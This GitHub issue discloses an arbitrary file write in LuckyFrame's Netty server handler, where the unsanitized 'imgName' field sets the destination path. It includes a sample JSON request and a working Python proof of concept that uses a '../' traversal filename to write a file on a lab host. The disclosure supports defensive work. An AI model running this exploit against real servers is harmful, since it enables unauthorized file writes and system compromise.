Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Arbitrary file upload vulnerability #21

Open
S2eTo opened this issue Dec 13, 2022 · 0 comments
Open

Arbitrary file upload vulnerability #21

S2eTo opened this issue Dec 13, 2022 · 0 comments

Comments

@S2eTo
Copy link

S2eTo commented Dec 13, 2022

The server uses netty to start the server, and then processes messages in ServerHandler#channelRead

Use fastjson to parse json data, and distinguish different request methods through CLIENT_METHOD("method") in the data

com.luckyframe.common.netty.ServerHandler#channelRead
image

When processing the upload request method, the IMG_NAME("imgName") in the data body was directly obtained for splicing, resulting in an arbitrary file writing vulnerability

com.luckyframe.common.netty.ServerHandler#channelRead
image

The important fields are that imgName is the destination filename on the server

The content of the file is controlled by fileUploadFile where bytes is the encoded data of base64, starPos, endPos are the start position and end position respectively

{
    "imgName":"file",
    "method":"upload",
    "data":{
        "code":1,
        "fileUploadFile":{
            "bytes":"YWJjZGVmZ2hpag==",
            "endPos":10,
            "file":"",
            "starPos":0
        },
        "message":"test",
        "uniId":"2131231"
    },
    "start":0,
    "uuid":"1231231"
}

Scripting with Python

import socket
import base64

dst_filename = "../upload.xxx"
file_content = "Upload Success!!!!"
b64_file_content = base64.b64encode(file_content.encode()).decode()
content_length = len(file_content)

upload_data = str({
    "imgName": dst_filename,
    "method": "upload",
    "data": {
        "code": 1,
        "fileUploadFile": {
            "bytes": b64_file_content,
            "endPos": content_length,
            "file": "",
            "starPos": 0
        },
        "message": "test",
        "uniId": "2131231"
    },
    "start": 0,
    "uuid": "1231231"
})

register_client_data = str({
    "hostName": "172.22.96.22", "method": "clientUp",
    "clientName": "", "ip": "172.22.96.22", "version": "3.5"
})

client = socket.socket()
client.connect(("192.168.157.1", 7070))
client.send(f'{register_client_data}$_'.encode())
print(client.recv(4096))
client.send(f"{upload_data}$_".encode())
print(client.recv(65535))
client.close()

uploaded successfully
image
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
None yet
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
1 participant
@S2eTo